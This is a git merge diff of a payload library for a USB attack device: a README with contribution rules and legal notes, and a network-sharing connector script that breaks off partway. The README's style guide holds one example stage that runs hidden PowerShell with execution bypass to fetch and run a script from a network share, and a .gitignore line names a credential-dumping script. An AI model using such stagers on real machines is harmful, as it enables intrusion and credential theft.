Merge branch 'master' of github.com:sridharas04/bashbunny-payloads
|
@ -1,3 +1,4 @@
|
|||
.DS_Store
|
||||
/.project
|
||||
/payloads/library/DumpCreds_2.0/PS/Invoke-M1m1d0gz.ps1
|
||||
bunny_connecter_config.txt
|
||||
|
|
295
README.md
|
@ -1,9 +1,290 @@
|
|||
# Payload Library for the Bash Bunny by Hak5
|
||||
# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
|
||||
|
||||
![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png)
|
||||
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
|
||||
|
||||
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
|
||||
* [Documentation and Wiki](https://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
|
||||
* [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums")
|
||||
* IRC: irc.hak5.org #BashBunny
|
||||
* Discord: https://discord.gg/WuteWPf
|
||||
**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** <a href="#legal"><b>See Legal and Disclaimers</b></a>
|
||||
|
||||
<div align="center">
|
||||
<img src="https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
|
||||
<img src="https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
<br/>
|
||||
<img src="https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
<img src="https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
</div>
|
||||
<br/>
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com/blogs/payloads/tagged/bash-bunny">View Featured Bash Bunny Payloads and Leaderboard</a>
|
||||
<br/><i>Get your payload in front of thousands. Enter to win over $2,000 in prizes in the <a href="https://hak5.org/pages/payload-awards">Hak5 Payload Awards!</a></i>
|
||||
</p>
|
||||
|
||||
<div align="center">
|
||||
<a href="https://hak5.org/discord"><img src="https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord&style=for-the-badge"></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
# Table of contents
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#about-the-bash-bunny">About the Bash Bunny</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
|
||||
|
||||
|
||||
## Shop
|
||||
- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
|
||||
- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
|
||||
- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
|
||||
## Getting Started
|
||||
- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
|
||||
## Documentation / Learn More
|
||||
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
|
||||
|
||||
## Community
|
||||
*Got Questions? Need some help? Reach out:*
|
||||
- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
|
||||
|
||||
## Additional Links
|
||||
<b> Follow the creators </b><br/>
|
||||
<p>
|
||||
<b>Korben's Socials</b><br/>
|
||||
<a href="https://twitter.com/notkorben"><img src="https://img.shields.io/twitter/follow/notkorben?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5korben"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C"/></a>
|
||||
<br/>
|
||||
<b>Darren's Socials</b><br/>
|
||||
<a href="https://twitter.com/hak5darren"><img src="https://img.shields.io/twitter/follow/hak5darren?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5darren"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C"/></a>
|
||||
</p>
|
||||
|
||||
<br/>
|
||||
<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>
|
||||
|
||||
Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
|
||||
|
||||
<b><div align="center">
|
||||
<br/>
|
||||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=-UmvZdDxCiI">
|
||||
<img src="https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png" width="500"/>
|
||||
</a>
|
||||
<br/>
|
||||
</p>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">ADVANCED ATTACKS </div>
|
||||
|
||||
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE PAYLOADS </div>
|
||||
|
||||
Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE POWERFUL HARDWARE </div>
|
||||
|
||||
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
|
||||
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
|
||||
<br/><br/></i><br/>
|
||||
<a href="https://hak5.org/products/payload-studio-pro">Become a PayloadStudio Pro</a> and <b> Unleash your hacking creativity! </b>
|
||||
<br/>
|
||||
OR
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org/community/"> Try Community Edition FREE</a>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557">
|
||||
<br/>
|
||||
<i> Payload Studio Themes Preview GIF </i>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513">
|
||||
<br/>
|
||||
<i> Payload Studio Autocomplete Preview GIF </i>
|
||||
</p>
|
||||
|
||||
|
||||
## Disclaimer
|
||||
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
|
||||
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
# CONFIGURATION
|
||||
# REQUIRED - Provide URL used for Example
|
||||
MY_TARGET_URL="example.com"
|
||||
|
||||
# OPTIONAL - How long until payload starts; default 5s
|
||||
BOOT_DELAY="5000"
|
||||
|
||||
QUACK DELAY $BOOT_DELAY
|
||||
...
|
||||
QUACK STRING $MY_TARGET_URL
|
||||
...
|
||||
```
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
# Title: Example Payload
|
||||
# Author: Korben Dallas
|
||||
# Description: Opens hidden powershell and
|
||||
# Target: Windows 10
|
||||
# Props: Hak5, Darren Kitchen, Korben
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
```
|
||||
|
||||
|
||||
### Binaries
|
||||
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
|
||||
|
||||
|
||||
### Configuration Options
|
||||
Configurable options should be specified in variables at the top of the payload.txt file
|
||||
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/quickcreds
|
||||
|
||||
### LED
|
||||
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
|
||||
|
||||
# Initialization
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
# Attack
|
||||
LED ATTACK
|
||||
ATTACKMODE HID ECM_ETHERNET
|
||||
|
||||
### Stages and States
|
||||
Stages should be documented with comments
|
||||
|
||||
# Keystroke Injection Stage
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
|
||||
GET HOST_IP
|
||||
LED STAGE1
|
||||
ATTACKMODE HID
|
||||
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
|
||||
|
||||
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
|
||||
|
||||
<h1><a href="https://hak5.org/pages/policy">Legal</a></h1>
|
||||
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
|
||||
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
|
||||
Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
|
||||
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
|
||||
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
|
||||
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
|
||||
|
||||
See also:
|
||||
|
||||
[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
|
||||
|
||||
[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
|
||||
|
||||
# Disclaimer
|
||||
<h3><b>As with any script, you are advised to proceed with caution.</h3></b>
|
||||
<h3><b>Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.</h3></b>
|
||||
|
|
|
@ -0,0 +1,321 @@
|
|||
#!/bin/bash
|
||||
# Bash Bunny Connector for Linux
|
||||
# EULA https://www.bashbunny.com/licence/eula.txt
|
||||
# License https://www.bashbunny.com/licence/software_licence.txt
|
||||
|
||||
bbver=1
|
||||
BBSH_CONFIG="$(dirname $0)/bunny_connecter_config.txt"
|
||||
|
||||
if [ "$EUID" -ne 0 ]
|
||||
then echo "This Bash Bunny Connection script requires root."
|
||||
sudo su -s "$0"
|
||||
exit
|
||||
fi
|
||||
|
||||
function banner {
|
||||
# Show random banner because 1337
|
||||
b=$(( ( RANDOM % 5 ) + 1 ))
|
||||
case "$b" in
|
||||
1)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
2)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
3)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
4)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
5)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function showsettings {
|
||||
printf "\n\
|
||||
$(tput bold)Saved Settings$(tput sgr0): Share Internet connection from $sbunnywan\n\
|
||||
to Bash Bunny at $sbunnylan through default gateway $sbunnygw\n"
|
||||
}
|
||||
|
||||
function menu {
|
||||
start_clean # removes bunny related rules without doing a full flush
|
||||
printf "\n\
|
||||
[$(tput bold)C$(tput sgr0)]onnect using saved settings\n\
|
||||
[$(tput bold)G$(tput sgr0)]uided setup (recommended)\n\
|
||||
[$(tput bold)M$(tput sgr0)]anual setup\n\
|
||||
[$(tput bold)A$(tput sgr0)]dvanced IP settings\n\
|
||||
[$(tput bold)Q$(tput sgr0)]uit\n\n "
|
||||
read -r -sn1 key
|
||||
case "$key" in
|
||||
[gG]) guidedsetup;;
|
||||
[mM]) manualsetup;;
|
||||
[cC]) connectsaved;;
|
||||
[aA]) advancedsetup;;
|
||||
[bB]) bunny;;
|
||||
[qQ]) printf "\n"; start_clean; exit;;
|
||||
esac
|
||||
}
|
||||
|
||||
function manualsetup {
|
||||
ipinstalled=$(which ip)
|
||||
if [[ "$?" == 0 ]]; then
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
printf "\n Select Bash Bunny Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " planq
|
||||
if [ "$planq" -eq "$planq" ] 2>/dev/null; then
|
||||
sbunnylan=(${ifaces[planq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n Select Internet Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " inetq
|
||||
if [ "$inetq" -eq "$inetq" ] 2>/dev/null; then
|
||||
sbunnywan=(${ifaces[inetq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n$(netstat -nr)\n\n"
|
||||
read -r -p " Specify Default Gateway IP Address: " sbunnygw
|
||||
savechanges
|
||||
else
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"
|
||||
menu
|
||||
fi
|
||||
}
|
||||
|
||||
function guidedsetup {
|
||||
hasiproute2=$(which ip)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"; menu
|
||||
fi
|
||||
hasdefaultroute=$(ip route)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n No route detected. Check connection and try again.\n"; menu
|
||||
fi
|
||||
|
||||
printf "\n $(tput setaf 3)Step 1 of 3: Select Default Gateway$(tput sgr0)\n\
|
||||
Default gateway reported as $(tput bold)$(ip route | grep default | awk {'print $3'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported default gateway? [Y/n]? " usedgw
|
||||
case $usedgw in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnygw=($(ip route | grep default | awk {'print $3'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n$(ip route)\n\n"
|
||||
read -r -p " Specify the default gateway by IP address: " sbunnygw
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 2 of 3: Select Internet Interface$(tput sgr0)\n\
|
||||
Internet interface reported as $(tput bold)$(ip route | grep default | awk {'print $5'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported Internet interface? [Y/n]? " useii
|
||||
case $useii in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnywan=($(ip route | grep default | awk {'print $5'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the internet interface by name: " sbunnywan
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 3 of 3: Select Bash Bunny Interface$(tput sgr0)\n Please connect the Bash Bunny to this computer.\n "
|
||||
|
||||
a="0"
|
||||
until bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en')
|
||||
do
|
||||
printf "."
|
||||
sleep 1
|
||||
a=$[$a+1]
|
||||
if [[ $a == "51" ]]; then
|
||||
printf "\n "
|
||||
a=0
|
||||
fi
|
||||
done
|
||||
printf "[Checking]"
|
||||
sleep 5 # Wait as the system is likely to rename interface. Sleeping rather than more advanced error handling becasue reasons.
|
||||
bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en' | sed 's/://g')
|
||||
printf "\n Detected Bash Bunny on interface $(tput bold)$bunnyiface$(tput sgr0)\n";
|
||||
read -r -p " Use the above detected Bash Bunny interface? [Y/n]? " pi
|
||||
case $pi in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnylan=$bunnyiface
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the Bash Bunny interface by name: " sbunnylan
|
||||
;;
|
||||
esac
|
||||
savechanges
|
||||
}
|
||||
|
||||
function advancedsetup {
|
||||
printf "\n\
|
||||
By default the Bash Bunny resides on the $(tput bold)172.16.64.0/24$(tput sgr0) network\n\
|
||||
with the IP Address $(tput bold)172.16.64.1$(tput sgr0) and Ethernet default route $(tput bold)172.16.64.64$(tput sgr0).\n\n\
|
||||
The Bash Bunny expects an Internet connection from 172.16.64.64 by\n\
|
||||
default, which this script aids in configuring. These IP addresses may\n\
|
||||
be changed if desired by modifying network configs on the Bash Bunny.\n\n"
|
||||
read -r -p " Continue with advanced IP config [y/N]? " qcontinue
|
||||
case $qcontinue in
|
||||
[nN][oO]|[nN]|'') menu ;;
|
||||
[yY][eE][sS]|[yY])
|
||||
read -r -p " Bash Bunny Network [172.16.42.0/24]: " sbunnynet
|
||||
if [[ $sbunnynet == '' ]]; then
|
||||
sbunnynet=172.16.64.0/24 # Bash Bunny network. Default is 172.16.64.0/24
|
||||
fi
|
||||
read -r -p " Bash Bunny Netmask [255.255.255.0]: " sbunnynmask
|
||||
if [[ $sbunnynmask == '' ]]; then
|
||||
sbunnynmask=255.255.255.0 #Default netmask for /24 network
|
||||
fi
|
||||
read -r -p " Host IP Address [172.16.42.42]: " sbunnyhostip
|
||||
if [[ $sbunnyhostip == '' ]]; then
|
||||
sbunnyhostip=172.16.64.64 #IP Address of host computer
|
||||
fi
|
||||
read -r -p " Bash Bunny IP Address [172.16.42.1]: " sbunnyip
|
||||
if [[ $sbunnyip == '' ]]; then
|
||||
sbunnyip=172.16.64.1 #If this seems familiar it's becuase I'm just recycling wp6.sh from the WiFi Pineapple
|
||||
fi
|
||||
printf "\n Advanced IP settings will be saved for future sessions.\n Default settings may be restored by selecting Advanced IP settings and\n pressing [ENTER] when prompted for IP settings.\n\n Press any key to continue"
|
||||
savechanges
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function savechanges {
|
||||
# using ";" as a delmiter in sed is a-okay
|
||||
sed -i "s;^sbunnynmask.*;sbunnynmask=$sbunnynmask;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnynet.*;sbunnynet=$sbunnynet;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnylan.*;sbunnylan=$sbunnylan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnywan.*;sbunnywan=$sbunnywan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnygw.*;sbunnygw=$sbunnygw;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyhostip.*;sbunnyhostip=$sbunnyhostip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyip.*;sbunnyip=$sbunnyip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sfirsttime.*;sfirsttime=0;" "$BBSH_CONFIG"
|
||||
sfirsttime=0
|
||||
printf "\n Settings saved.\n"
|
||||
showsettings
|
||||
menu
|
||||
}
|
||||
|
||||
function connectsaved {
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu
|
||||
fi
|
||||
